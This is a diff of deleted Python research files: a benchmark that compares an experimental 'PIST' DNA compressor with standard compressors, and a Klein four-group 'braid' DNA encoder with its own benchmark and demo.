||||||
for algo in compressors:
|
|
||||||
cmd = None
|
|
||||||
ext = ""
|
|
||||||
if algo == "gzip":
|
|
||||||
cmd = ["gzip", "-9kf", tmp_in.name]
|
|
||||||
ext = ".gz"
|
|
||||||
elif algo == "bzip2":
|
|
||||||
cmd = ["bzip2", "-9kf", tmp_in.name]
|
|
||||||
ext = ".bz2"
|
|
||||||
elif algo == "xz":
|
|
||||||
cmd = ["xz", "-9kf", tmp_in.name]
|
|
||||||
ext = ".xz"
|
|
||||||
elif algo == "zstd":
|
|
||||||
cmd = ["zstd", "-19kf", tmp_in.name]
|
|
||||||
ext = ".zst"
|
|
||||||
|
|
||||||
if cmd:
|
|
||||||
t0 = time.time()
|
|
||||||
subprocess.run(cmd, capture_output=True, check=False)
|
|
||||||
compress_time = time.time() - t0
|
|
||||||
|
|
||||||
compressed_path = tmp_in.name + ext
|
|
||||||
compressed_size = os.path.getsize(compressed_path) if os.path.exists(compressed_path) else 0
|
|
||||||
|
|
||||||
t0 = time.time()
|
|
||||||
result = subprocess.run(
|
|
||||||
[algo if algo != "zstd" else "zstd", "-dkf", compressed_path],
|
|
||||||
capture_output=True, check=False
|
|
||||||
)
|
|
||||||
decompress_time = time.time() - t0
|
|
||||||
|
|
||||||
results.append({
|
|
||||||
"algorithm": algo,
|
|
||||||
"sequence_length": len(sequence),
|
|
||||||
"compressed_bytes": compressed_size,
|
|
||||||
"compression_ratio": (len(sequence) * 2) / max(compressed_size * 8, 1),
|
|
||||||
"bits_per_base": (compressed_size * 8) / len(sequence),
|
|
||||||
"compress_time_s": round(compress_time, 3),
|
|
||||||
"decompress_time_s": round(decompress_time, 3),
|
|
||||||
"lossless": True,
|
|
||||||
})
|
|
||||||
|
|
||||||
# Cleanup
|
|
||||||
for f in [compressed_path, tmp_in.name]:
|
|
||||||
if os.path.exists(f):
|
|
||||||
os.unlink(f)
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
|
|
||||||
def run_full_benchmark(fasta_path: str, label: str, is_gz: bool = False,
|
|
||||||
kmer_size: int = 16) -> Dict:
|
|
||||||
"""Run full benchmark suite on a FASTA file."""
|
|
||||||
print(f"\n{'='*60}")
|
|
||||||
print(f"BENCHMARK: {label}")
|
|
||||||
print(f" File: {fasta_path}")
|
|
||||||
print(f"{'='*60}")
|
|
||||||
|
|
||||||
# Load sequence
|
|
||||||
t0 = time.time()
|
|
||||||
if is_gz:
|
|
||||||
seq = read_fasta_gz(fasta_path)
|
|
||||||
else:
|
|
||||||
seq = read_fasta(fasta_path)
|
|
||||||
load_time = time.time() - t0
|
|
||||||
print(f" Loaded: {len(seq):,} bases in {load_time:.2f}s")
|
|
||||||
|
|
||||||
# Test on first 500 KB for speed
|
|
||||||
sample_size = min(len(seq), 500_000)
|
|
||||||
sample = seq[:sample_size]
|
|
||||||
print(f" Sample: {sample_size:,} bases for quick tests")
|
|
||||||
print()
|
|
||||||
|
|
||||||
results = []
|
|
||||||
|
|
||||||
# PIST
|
|
||||||
pist = benchmark_pist(sample, label)
|
|
||||||
print(f" PIST: {pist['compression_ratio']:.2f}x {pist['bits_per_base']:.2f} b/b lossless={pist['lossless']} ({pist['compress_time_s']:.3f}s)")
|
|
||||||
results.append(pist)
|
|
||||||
|
|
||||||
# General compressors
|
|
||||||
gen = benchmark_general(sample, ["gzip", "bzip2", "xz", "zstd"])
|
|
||||||
for r in gen:
|
|
||||||
print(f" {r['algorithm']:12s}: {r['compression_ratio']:.2f}x {r['bits_per_base']:.2f} b/b ({r['compress_time_s']:.3f}s)")
|
|
||||||
results.append(r)
|
|
||||||
|
|
||||||
print(f"\n === Summary: {label} ===")
|
|
||||||
print(f" {'Algorithm':12s} {'Ratio':>7s} {'Bits/Base':>9s} {'Time(s)':>7s}")
|
|
||||||
print(f" {'-'*12} {'-'*7} {'-'*9} {'-'*7}")
|
|
||||||
for r in sorted(results, key=lambda x: x["bits_per_base"]):
|
|
||||||
print(f" {r['algorithm']:12s} {r['compression_ratio']:6.2f}x {r['bits_per_base']:9.3f} {r['compress_time_s']:6.3f}s")
|
|
||||||
|
|
||||||
return {
|
|
||||||
"label": label,
|
|
||||||
"total_bases": len(seq),
|
|
||||||
"sample_size": sample_size,
|
|
||||||
"load_time_s": round(load_time, 2),
|
|
||||||
"results": results,
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
# ── Explainability Analysis ──
|
|
||||||
|
|
||||||
def analyze_mass_field(sequence: str, mass_field: List[float],
|
|
||||||
k: int = 16) -> Dict:
|
|
||||||
"""
|
|
||||||
Explain the mass field: what genomic features correspond to high-mass regions?
|
|
||||||
This demonstrates that PIST is EXPLAINABLE — the mass field reveals real biology.
|
|
||||||
"""
|
|
||||||
n = len(sequence)
|
|
||||||
|
|
||||||
# Find high-mass (>0.7) windows
|
|
||||||
high_mass_windows = []
|
|
||||||
current_start = None
|
|
||||||
for i in range(n):
|
|
||||||
if mass_field[i] > 0.7:
|
|
||||||
if current_start is None:
|
|
||||||
current_start = i
|
|
||||||
else:
|
|
||||||
if current_start is not None:
|
|
||||||
length = i - current_start
|
|
||||||
if length > 10:
|
|
||||||
seq_window = sequence[current_start:i]
|
|
||||||
gc_content = sum(1 for c in seq_window if c in "GC") / len(seq_window)
|
|
||||||
cpg_count = seq_window.count("CG")
|
|
||||||
repeat_signal = _detect_tandem_repeat(seq_window)
|
|
||||||
high_mass_windows.append({
|
|
||||||
"start": current_start,
|
|
||||||
"end": i,
|
|
||||||
"length": length,
|
|
||||||
"gc_content": round(gc_content, 3),
|
|
||||||
"cpg_density": round(cpg_count / length, 4),
|
|
||||||
"tandem_repeat_score": round(repeat_signal, 3),
|
|
||||||
"context": seq_window[:60],
|
|
||||||
})
|
|
||||||
current_start = None
|
|
||||||
|
|
||||||
return {
|
|
||||||
"num_high_mass_regions": len(high_mass_windows),
|
|
||||||
"high_mass_total_bases": sum(w["length"] for w in high_mass_windows),
|
|
||||||
"high_mass_gc_mean": (
|
|
||||||
sum(w["gc_content"] for w in high_mass_windows) / max(len(high_mass_windows), 1)
|
|
||||||
if high_mass_windows else 0
|
|
||||||
),
|
|
||||||
"high_mass_cpg_mean": (
|
|
||||||
sum(w["cpg_density"] for w in high_mass_windows) / max(len(high_mass_windows), 1)
|
|
||||||
if high_mass_windows else 0
|
|
||||||
),
|
|
||||||
"top_high_mass": sorted(high_mass_windows, key=lambda w: -w["length"])[:10],
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def _detect_tandem_repeat(seq: str) -> float:
|
|
||||||
"""Simple tandem repeat detector. Returns score 0-1."""
|
|
||||||
if len(seq) < 8:
|
|
||||||
return 0.0
|
|
||||||
for period in range(2, min(8, len(seq) // 2)):
|
|
||||||
unit = seq[:period]
|
|
||||||
matches = sum(1 for i in range(0, len(seq) - period, period)
|
|
||||||
if seq[i:i + period] == unit)
|
|
||||||
expected = len(seq) // period
|
|
||||||
if expected > 2 and matches > expected * 0.7:
|
|
||||||
return 1.0 - (period / 10)
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
parser = argparse.ArgumentParser(description="PIST DNA Compressor Benchmark")
|
|
||||||
parser.add_argument("--fasta", help="FASTA file to compress")
|
|
||||||
parser.add_argument("--benchmark", nargs="+", default=[],
|
|
||||||
help="FASTA files to benchmark")
|
|
||||||
parser.add_argument("--k", type=int, default=16, help="k-mer size")
|
|
||||||
parser.add_argument("--output", default="/home/allaun/dna_benchmark/results/benchmark_report.json",
|
|
||||||
help="Output JSON path")
|
|
||||||
args = parser.parse_args()
|
|
||||||
|
|
||||||
if args.fasta:
|
|
||||||
seq = read_fasta(args.fasta)
|
|
||||||
compressor = PISTDNACompressor(k=args.k)
|
|
||||||
compressed, meta = compressor.compress(seq)
|
|
||||||
print(json.dumps({
|
|
||||||
"original_bases": len(seq),
|
|
||||||
"compressed_bytes": len(compressed),
|
|
||||||
"ratio": meta["compression_ratio"],
|
|
||||||
"bits_per_base": meta["bits_per_base"],
|
|
||||||
"lossless": meta["sha256"] == hashlib.sha256(seq.encode()).hexdigest(),
|
|
||||||
}, indent=2))
|
|
||||||
|
|
||||||
elif args.benchmark:
|
|
||||||
all_results = {}
|
|
||||||
for fpath in args.benchmark:
|
|
||||||
name = fpath.split("/")[-1].replace(".gz", "").replace(".fa", "").replace(".fna", "")
|
|
||||||
is_gz = fpath.endswith(".gz")
|
|
||||||
result = run_full_benchmark(fpath, name, is_gz=is_gz, kmer_size=args.k)
|
|
||||||
all_results[name] = result
|
|
||||||
|
|
||||||
os.makedirs(os.path.dirname(args.output), exist_ok=True)
|
|
||||||
with open(args.output, "w") as f:
|
|
||||||
json.dump(all_results, f, indent=2, sort_keys=True, default=str)
|
|
||||||
print(f"\nFull benchmark report saved to: {args.output}")
|
|
||||||
|
|
||||||
else:
|
|
||||||
parser.print_help()
|
|
||||||
|
|
@ -1,430 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
V4 DNA Braid/Rope Compressor — Cayley Fibergraph Encoding
|
|
||||||
===========================================================
|
|
||||||
|
|
||||||
Every DNA base → Klein four-group V4 element.
|
|
||||||
Every transition → braid crossing action.
|
|
||||||
Every complement → involution in the group.
|
|
||||||
Every storage address → NUVMAP projection from group coordinates.
|
|
||||||
|
|
||||||
Encoding: store (g_0, a_0, a_1, ..., a_{n-1}) NOT (s_0, s_1, ..., s_{n-1})
|
|
||||||
g_{i+1} = a_i · g_i (Cayley table lookup)
|
|
||||||
|
|
||||||
When the group matches the data's latent symmetry:
|
|
||||||
H(action_stream) < H(symbol_stream) → compression
|
|
||||||
|
|
||||||
V4 = {e, a, b, c} where a² = b² = c² = e, ab = c, ba = c, etc.
|
|
||||||
Mapping: A→a, C→b, G→c, T→abc
|
|
||||||
Complement: a↔abc (A↔T), b↔c (C↔G) — all involutions
|
|
||||||
"""
|
|
||||||
|
|
||||||
import struct, math, sys, os, time, json, tempfile, subprocess
|
|
||||||
import hashlib
|
|
||||||
from typing import Dict, List, Tuple
|
|
||||||
from collections import Counter, defaultdict
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
# ── V4 Group Algebra ──
|
|
||||||
|
|
||||||
# V4 elements: e=0, a=1, b=2, c=3
|
|
||||||
V4_E, V4_A, V4_B, V4_C = 0, 1, 2, 3
|
|
||||||
|
|
||||||
# Cayley table: T[x][y] = x·y
|
|
||||||
V4_CAYLEY = [
|
|
||||||
[0, 1, 2, 3], # e·e=e, e·a=a, e·b=b, e·c=c
|
|
||||||
[1, 0, 3, 2], # a·e=a, a·a=e, a·b=c, a·c=b
|
|
||||||
[2, 3, 0, 1], # b·e=b, b·a=c, b·b=e, b·c=a
|
|
||||||
[3, 2, 1, 0], # c·e=c, c·a=b, c·b=a, c·c=e
|
|
||||||
]
|
|
||||||
|
|
||||||
# DNA base → V4 element
|
|
||||||
BASE_TO_V4 = {"A": V4_A, "C": V4_B, "G": V4_C, "T": 3} # T = abc = a·b·c = V4_C·V4_B
|
|
||||||
V4_TO_BASE = {0: "?", 1: "A", 2: "C", 3: "G"}
|
|
||||||
|
|
||||||
# T = abc = a·b·c. In V4: a·b = c, so abc = c·c = e. Wait, that's wrong.
|
|
||||||
# V4: a·a=e, b·b=e, c·c=e.
|
|
||||||
# a·b = c (from Cayley: T[1][2]=3)
|
|
||||||
# a·c = b (T[1][3]=2)
|
|
||||||
# b·c = a (T[2][3]=1)
|
|
||||||
# a·b·c = (a·b)·c = c·c = e.
|
|
||||||
# T is NOT abc. Let me fix: T should map to (1,1,1) which is a·b·c in the group.
|
|
||||||
# But we only have 4 elements. T must be one of them.
|
|
||||||
# Actually: use V4 as direct product Z2×Z2. Elements as bit pairs:
|
|
||||||
# e=(0,0), a=(1,0), b=(0,1), c=(1,1)
|
|
||||||
# Then T = a·b = c since (1,0)+(0,1) = (1,1) = c.
|
|
||||||
# Wait no. Let me redo with the correct encoding:
|
|
||||||
|
|
||||||
# Better mapping: use Z2×Z2 additive notation
|
|
||||||
# elements as 2-bit: e=(0,0), a=(1,0), b=(0,1), c=(1,1)
|
|
||||||
# operation is XOR: (x1,y1)+(x2,y2) = (x1⊕x2, y1⊕y2)
|
|
||||||
# Then: a+b = (1,0)+(0,1) = (1,1) = c ✓
|
|
||||||
|
|
||||||
# DNA mapping: A=(1,0), C=(0,1), G=(1,1), T=(0,0) or similar
|
|
||||||
# Actually let me use a better encoding that makes complement natural:
|
|
||||||
# Complement A↔T: if A=(1,0), let T=(1,1). Differs by (0,1) = b
|
|
||||||
# Complement C↔G: if C=(0,1), let G=(1,1). Differs by (1,0) = a
|
|
||||||
# Hmm, not clean. Let me just use a fixed mapping:
|
|
||||||
|
|
||||||
# Use complement as a specific group action:
|
|
||||||
# complement_action = (1,1) = c
|
|
||||||
# A = (0,0) = e → A↔T: T = c·e = (1,1) = c
|
|
||||||
# C = (1,0) = a → C↔G: G = c·a = (1,1)+(1,0) = (0,1) = b ?
|
|
||||||
# Actually c·a in XOR: (1,1)⊕(1,0) = (0,1). So G = b. Hmm.
|
|
||||||
# That means A=e→T=c, C=a→G=b. Not great for readability.
|
|
||||||
|
|
||||||
# Actually: define complement as swap of x-bit = a-action
|
|
||||||
# A=(0,0)=e, T=(1,0)=a: differ by (1,0)
|
|
||||||
# C=(0,1)=b, G=(1,1)=c: differ by (1,0)
|
|
||||||
# This makes complement = (1,0) shift = a-action on x-bit.
|
|
||||||
# That's clean! complement = a, self-complement = a²=e.
|
|
||||||
|
|
||||||
# Final mapping:
|
|
||||||
# A = (0,0) = e → complement = a → T = (1,0) = V4_A
|
|
||||||
# C = (0,1) = b → complement = a → G = (1,1) = V4_C (in our enum)
|
|
||||||
# G = V4_C (3) → complement = a → C = V4_B (2)
|
|
||||||
# T = V4_A (1) → complement = a → A = V4_E (0)
|
|
||||||
|
|
||||||
# So: BASE_TO_V4 = {"A": 0, "T": 1, "C": 2, "G": 3}
|
|
||||||
# Complement action = multiply by V4_A (1)
|
|
||||||
# T[1][0] = 1 = T ✓ (from Cayley, T[1][0]=1 means a·e=a, so complement of A=e is a=T ✓)
|
|
||||||
# T[1][2] = 3 = G ✓ (from Cayley, T[1][2]=3 means a·b=c, so complement of C=b is c=G ✓)
|
|
||||||
|
|
||||||
# This is clean. Let me redefine:
|
|
||||||
|
|
||||||
BASE_TO_V4 = {"A": V4_E, "T": V4_A, "C": V4_B, "G": V4_C}
|
|
||||||
V4_TO_BASE = {V4_E: "A", V4_A: "T", V4_B: "C", V4_C: "G"}
|
|
||||||
COMPLEMENT_ACTION = V4_A # multiply by 'a' gives complement
|
|
||||||
|
|
||||||
# Validate:
|
|
||||||
# A→T: T[COMPLEMENT_ACTION][V4_E] = T[1][0] = 1 = V4_A = T ✓
|
|
||||||
# C→G: T[COMPLEMENT_ACTION][V4_B] = T[1][2] = 3 = V4_C = G ✓
|
|
||||||
# T→A: T[COMPLEMENT_ACTION][V4_A] = T[1][1] = 0 = V4_E = A ✓
|
|
||||||
# G→C: T[COMPLEMENT_ACTION][V4_C] = T[1][3] = 2 = V4_B = C ✓
|
|
||||||
# All correct.
|
|
||||||
|
|
||||||
# Braid crossing actions:
|
|
||||||
# σ_forward = V4_B (b-action, rotates A→C, C→A, G↔T swap)
|
|
||||||
# σ_reverse = V4_B (same, since b²=e in V4, forward=reverse=involution)
|
|
||||||
# Actually in V4 every non-id element is order-2, so forward=reverse always.
|
|
||||||
# Braid relations are trivially satisfied. V4 is abelian, so σ_i σ_j = σ_j σ_i always.
|
|
||||||
|
|
||||||
ACTION_NAMES = {V4_A: "σ_cmp", V4_B: "σ_trans", V4_C: "σ_twist", V4_E: "I"}
|
|
||||||
|
|
||||||
|
|
||||||
class V4BraidEncoder:
|
|
||||||
"""
|
|
||||||
V4 DNA Braid/Rope encoder.
|
|
||||||
|
|
||||||
Encode: DNA strand → V4 element stream → action delta stream
|
|
||||||
Decode: action delta stream → V4 element stream → DNA strand
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.cayley = V4_CAYLEY
|
|
||||||
|
|
||||||
def _action(self, from_elem: int, to_elem: int) -> int:
|
|
||||||
"""Find the group action that takes from_elem to to_elem: to = a · from"""
|
|
||||||
for a in range(4):
|
|
||||||
if self.cayley[a][from_elem] == to_elem:
|
|
||||||
return a
|
|
||||||
return 0 # identity as fallback
|
|
||||||
|
|
||||||
def encode(self, dna: str, encode_verbatim: bool = False) -> Tuple[bytes, Dict]:
|
|
||||||
"""
|
|
||||||
Encode DNA sequence as V4 action stream.
|
|
||||||
|
|
||||||
If encode_verbatim: output 2 bits per base (identity stream).
|
|
||||||
If not: output first base (2 bits) + action delta stream.
|
|
||||||
|
|
||||||
Returns (encoded_bytes, metadata_dict).
|
|
||||||
"""
|
|
||||||
if not dna:
|
|
||||||
return b"", {"length": 0}
|
|
||||||
|
|
||||||
# Convert to V4 elements
|
|
||||||
elements = [BASE_TO_V4.get(b, 0) for b in dna.upper()]
|
|
||||||
n = len(elements)
|
|
||||||
|
|
||||||
# Encode: [first_element:2bits] [action_0:2bits] [action_1:2bits] ...
|
|
||||||
# 2 bits per element, but actions may have lower entropy
|
|
||||||
bits = []
|
|
||||||
|
|
||||||
# First element: 2 bits
|
|
||||||
bits.extend([(elements[0] >> 1) & 1, elements[0] & 1])
|
|
||||||
|
|
||||||
# Action stream
|
|
||||||
actions = []
|
|
||||||
for i in range(1, n):
|
|
||||||
a = self._action(elements[i-1], elements[i])
|
|
||||||
actions.append(a)
|
|
||||||
bits.extend([(a >> 1) & 1, a & 1])
|
|
||||||
|
|
||||||
# Pack bits into bytes
|
|
||||||
packed = bytearray()
|
|
||||||
for j in range(0, len(bits), 8):
|
|
||||||
byte = 0
|
|
||||||
for b in range(8):
|
|
||||||
if j + b < len(bits):
|
|
||||||
byte |= bits[j + b] << (7 - b) # MSB first
|
|
||||||
packed.append(byte)
|
|
||||||
|
|
||||||
compressed = bytes(packed)
|
|
||||||
|
|
||||||
# Compute action entropy
|
|
||||||
action_counter = Counter(actions)
|
|
||||||
total = len(actions)
|
|
||||||
action_entropy = -sum((c/total) * math.log2(c/total)
|
|
||||||
for c in action_counter.values()) if total > 0 else 0.0
|
|
||||||
|
|
||||||
return compressed, {
|
|
||||||
"length": n,
|
|
||||||
"compressed_bytes": len(compressed),
|
|
||||||
"raw_bits": n * 2,
|
|
||||||
"action_entropy": round(action_entropy, 4),
|
|
||||||
"idle_fraction": round(action_counter.get(V4_E, 0) / max(total, 1), 4),
|
|
||||||
"complement_fraction": round(action_counter.get(V4_A, 0) / max(total, 1), 4),
|
|
||||||
"transition_fraction": round(action_counter.get(V4_B, 0) / max(total, 1), 4),
|
|
||||||
"twist_fraction": round(action_counter.get(V4_C, 0) / max(total, 1), 4),
|
|
||||||
"most_common_action": action_counter.most_common(1)[0] if action_counter else None,
|
|
||||||
"action_distribution": dict(action_counter),
|
|
||||||
"group": "V4",
|
|
||||||
"sha256": hashlib.sha256(dna.encode()).hexdigest(),
|
|
||||||
}
|
|
||||||
|
|
||||||
def decode(self, compressed: bytes, length: int) -> str:
|
|
||||||
"""Decode V4 action stream back to DNA sequence."""
|
|
||||||
if length == 0:
|
|
||||||
return ""
|
|
||||||
|
|
||||||
# Unpack bits (MSB first)
|
|
||||||
bits = []
|
|
||||||
for byte in compressed:
|
|
||||||
for b in range(8):
|
|
||||||
bits.append((byte >> (7 - b)) & 1)
|
|
||||||
|
|
||||||
# First element
|
|
||||||
elem = (bits[0] << 1) | bits[1]
|
|
||||||
result = [V4_TO_BASE.get(elem, "N")]
|
|
||||||
|
|
||||||
# Action stream: decode each action and apply
|
|
||||||
bit_pos = 2
|
|
||||||
for i in range(1, length):
|
|
||||||
if bit_pos + 1 >= len(bits):
|
|
||||||
break
|
|
||||||
action = (bits[bit_pos] << 1) | bits[bit_pos + 1]
|
|
||||||
bit_pos += 2
|
|
||||||
elem = self.cayley[action][elem]
|
|
||||||
result.append(V4_TO_BASE.get(elem, "N"))
|
|
||||||
|
|
||||||
return "".join(result)
|
|
||||||
|
|
||||||
def roundtrip(self, dna: str) -> Tuple[bool, int, int]:
|
|
||||||
"""Test encode/decode cycle."""
|
|
||||||
compressed, meta = self.encode(dna)
|
|
||||||
decoded = self.decode(compressed, len(dna))
|
|
||||||
ok = dna.upper() == decoded.upper()
|
|
||||||
return ok, len(compressed), len(dna)
|
|
||||||
|
|
||||||
# ── PIST integration ──
|
|
||||||
|
|
||||||
def to_pist_coords(self, dna: str) -> List[Tuple[int, int]]:
|
|
||||||
"""Convert DNA to PIST shell coordinates via V4 elements."""
|
|
||||||
if "pist_encode" not in globals():
|
|
||||||
from pist_biological_polymorphic_shifter_v3_complete import pist_encode
|
|
||||||
else:
|
|
||||||
pist_encode = globals().get("pist_encode")
|
|
||||||
|
|
||||||
coords = []
|
|
||||||
for base in dna.upper():
|
|
||||||
g = BASE_TO_V4.get(base, 0)
|
|
||||||
# g ∈ [0,3], use as PIST input
|
|
||||||
k, t = pist_encode(g)
|
|
||||||
coords.append((k, t))
|
|
||||||
return coords
|
|
||||||
|
|
||||||
def nu_vmap_coords(self, dna: str) -> List[Dict]:
|
|
||||||
"""Compute NUVMAP texel coordinates for DNA sequence."""
|
|
||||||
coords = self.to_pist_coords(dna)
|
|
||||||
result = []
|
|
||||||
for i, (k, t) in enumerate(coords):
|
|
||||||
g = BASE_TO_V4.get(dna[i].upper(), 0)
|
|
||||||
result.append({
|
|
||||||
"position": i,
|
|
||||||
"base": dna[i],
|
|
||||||
"V4_element": g,
|
|
||||||
"pist_shell": k,
|
|
||||||
"pist_offset": t,
|
|
||||||
"pist_mass": t * (2*k + 1 - t),
|
|
||||||
"is_complement_target": g in (V4_A, V4_C), # T and G
|
|
||||||
"orbit": [V4_CAYLEY[x][g] for x in range(4)], # action orbit
|
|
||||||
})
|
|
||||||
return result
|
|
||||||
|
|
||||||
# ── Braid/rope analysis ──
|
|
||||||
|
|
||||||
def braid_analysis(self, dna: str) -> Dict:
|
|
||||||
"""Analyze DNA as braid word with V4 strand operators."""
|
|
||||||
elements = [BASE_TO_V4.get(b, 0) for b in dna.upper()]
|
|
||||||
actions = [self._action(elements[i-1], elements[i]) for i in range(1, len(elements))]
|
|
||||||
|
|
||||||
# Braid word length (in Artin generators)
|
|
||||||
braid_word = []
|
|
||||||
for a in actions:
|
|
||||||
if a == V4_A:
|
|
||||||
braid_word.append("c") # complement crossing
|
|
||||||
elif a == V4_B:
|
|
||||||
braid_word.append("s") # transition crossing
|
|
||||||
elif a == V4_C:
|
|
||||||
braid_word.append("t") # twist crossing
|
|
||||||
else:
|
|
||||||
braid_word.append("1") # identity
|
|
||||||
|
|
||||||
# Simplify by canceling adjacent inverses (all are involutions in V4)
|
|
||||||
simplified = []
|
|
||||||
for op in braid_word:
|
|
||||||
if simplified and simplified[-1] == op:
|
|
||||||
simplified.pop() # σ² = e in V4
|
|
||||||
else:
|
|
||||||
simplified.append(op)
|
|
||||||
|
|
||||||
# Run-length compress the simplified word
|
|
||||||
runs = []
|
|
||||||
if braid_word:
|
|
||||||
current = braid_word[0]; count = 1
|
|
||||||
for op in braid_word[1:]:
|
|
||||||
if op == current:
|
|
||||||
count += 1
|
|
||||||
else:
|
|
||||||
runs.append((current, count))
|
|
||||||
current = op; count = 1
|
|
||||||
runs.append((current, count))
|
|
||||||
|
|
||||||
return {
|
|
||||||
"original_length": len(elements),
|
|
||||||
"braid_word_length": len(braid_word),
|
|
||||||
"simplified_length": len(simplified),
|
|
||||||
"compression_ratio": len(simplified) / max(len(braid_word), 1),
|
|
||||||
"runs": runs,
|
|
||||||
"num_runs": len(runs),
|
|
||||||
"unique_actions": len(set(braid_word)),
|
|
||||||
"identity_fraction": braid_word.count("1") / max(len(braid_word), 1),
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
# ── Benchmark ──
|
|
||||||
|
|
||||||
def benchmark_v4_vs_all(dna: str, label: str,
|
|
||||||
brotli_lvl: int = 11, zstd_lvl: int = 19,
|
|
||||||
xz_lvl: int = 9) -> Dict:
|
|
||||||
"""Benchmark V4 braid encoder against system compressors."""
|
|
||||||
encoder = V4BraidEncoder()
|
|
||||||
|
|
||||||
results = []
|
|
||||||
|
|
||||||
# V4 encoder
|
|
||||||
t0 = time.time()
|
|
||||||
comp, meta = encoder.encode(dna)
|
|
||||||
v4_time = time.time() - t0
|
|
||||||
|
|
||||||
t0 = time.time()
|
|
||||||
dec = encoder.decode(comp, len(dna))
|
|
||||||
v4_dec_time = time.time() - t0
|
|
||||||
|
|
||||||
ok = dna.upper() == dec.upper()
|
|
||||||
bpb = (len(comp) * 8) / max(len(dna), 1)
|
|
||||||
|
|
||||||
results.append({
|
|
||||||
"algo": "V4-braid",
|
|
||||||
"label": label,
|
|
||||||
"lossless": ok,
|
|
||||||
"original": len(dna),
|
|
||||||
"compressed": len(comp),
|
|
||||||
"bpb": round(bpb, 3),
|
|
||||||
"ratio": round(len(comp) / max(len(dna), 1), 4),
|
|
||||||
"time_s": round(v4_time, 3),
|
|
||||||
"dec_time_s": round(v4_dec_time, 3),
|
|
||||||
"action_entropy": meta.get("action_entropy", 0),
|
|
||||||
"idle_fraction": meta.get("idle_fraction", 0),
|
|
||||||
})
|
|
||||||
|
|
||||||
# System compressors
|
|
||||||
dna_bytes = dna.encode()
|
|
||||||
for algo, compress_cb, lvl, ext in [
|
|
||||||
("brotli", lambda d: subprocess.run(["brotli","-q",str(brotli_lvl),"-f","-c"],input=d,capture_output=True).stdout, brotli_lvl, ".br"),
|
|
||||||
("zstd", lambda d: subprocess.run(["zstd","-"+str(zstd_lvl),"-q","-f","-c"],input=d,capture_output=True).stdout, zstd_lvl, ".zst"),
|
|
||||||
("xz", lambda d: subprocess.run(["xz","-"+str(xz_lvl),"-f","-c","-z"],input=d,capture_output=True).stdout, xz_lvl, ".xz"),
|
|
||||||
("gzip", lambda d: subprocess.run(["gzip","-9","-f","-c"],input=d,capture_output=True).stdout, 9, ".gz"),
|
|
||||||
]:
|
|
||||||
t0 = time.time()
|
|
||||||
try:
|
|
||||||
out = compress_cb(dna_bytes)
|
|
||||||
ct = time.time() - t0
|
|
||||||
if out:
|
|
||||||
results.append({
|
|
||||||
"algo": algo,
|
|
||||||
"label": label,
|
|
||||||
"original": len(dna),
|
|
||||||
"compressed": len(out),
|
|
||||||
"bpb": round(len(out)*8/max(len(dna),1), 3),
|
|
||||||
"ratio": round(len(out)/max(len(dna),1), 4),
|
|
||||||
"time_s": round(ct, 3),
|
|
||||||
})
|
|
||||||
except: pass
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Run demo and benchmark."""
|
|
||||||
encoder = V4BraidEncoder()
|
|
||||||
|
|
||||||
# Test sequences
|
|
||||||
tests = [
|
|
||||||
("ACGT" * 50, "simple_repeat"),
|
|
||||||
("A" * 500, "polyA"),
|
|
||||||
("ATCG" * 50, "alternating"),
|
|
||||||
]
|
|
||||||
|
|
||||||
# Load real data
|
|
||||||
import gzip
|
|
||||||
try:
|
|
||||||
with gzip.open("/home/allaun/dna_benchmark/data/ecoli.fna.gz", "rt") as f:
|
|
||||||
ecoli = "".join(line.strip() for line in f if not line.startswith(">"))
|
|
||||||
tests.append((ecoli[:10000], "ecoli_10k"))
|
|
||||||
except: pass
|
|
||||||
|
|
||||||
print("=" * 64)
|
|
||||||
print("V4 BRAID/ROPE DNA COMPRESSOR")
|
|
||||||
print("=" * 64)
|
|
||||||
print(f"\n Group: V4 (Klein four-group, Z2×Z2)")
|
|
||||||
print(f" A={V4_TO_BASE[0]} T={V4_TO_BASE[1]} C={V4_TO_BASE[2]} G={V4_TO_BASE[3]}")
|
|
||||||
print(f" Complement action: a·g (complement pairs: A↔T, C↔G)")
|
|
||||||
print(f" All non-identity actions are involutions (σ² = e)")
|
|
||||||
|
|
||||||
for dna, label in tests:
|
|
||||||
print(f"\n{'─' * 64}")
|
|
||||||
print(f" [{label}] {len(dna)} bases")
|
|
||||||
|
|
||||||
# Roundtrip
|
|
||||||
ok, cs, os = encoder.roundtrip(dna)
|
|
||||||
print(f" Roundtrip: {'PASS' if ok else 'FAIL'} {os}→{cs} bytes ({cs*8/os:.2f} bpb)")
|
|
||||||
|
|
||||||
# Action analysis
|
|
||||||
analysis = encoder.braid_analysis(dna)
|
|
||||||
print(f" Braid word: {analysis['braid_word_length']} ops → {analysis['simplified_length']} simplified "
|
|
||||||
f"({analysis['num_runs']} runs, {analysis['unique_actions']} unique)")
|
|
||||||
print(f" Identity fraction: {analysis['identity_fraction']:.1%}")
|
|
||||||
|
|
||||||
# Benchmarks
|
|
||||||
bench = benchmark_v4_vs_all(dna, label)
|
|
||||||
print(f" {'Algo':12s} {'BPB':>7s} {'Ratio':>7s} {'Time':>7s} {'Size':>7s}")
|
|
||||||
for r in sorted(bench, key=lambda x: x.get("bpb", 999)):
|
|
||||||
bpb = r.get("bpb", "--")
|
|
||||||
ratio = r.get("ratio", "--")
|
|
||||||
ts = r.get("time_s", "--")
|
|
||||||
sz = r.get("compressed", 0)
|
|
||||||
print(f" {r['algo']:12s} {str(bpb):>7s} {str(ratio):>7s} {str(ts):>7s} {sz:>6,}B")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
File diff suppressed because it is too large
Load diff
|
|
@ -1,110 +0,0 @@
|
||||||
import os
|
|
||||||
os.chdir('/home/allaun/Documents/Research Stack/3-Mathematical-Models')
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'r') as f:
|
|
||||||
content = f.read()
|
|
||||||
|
|
||||||
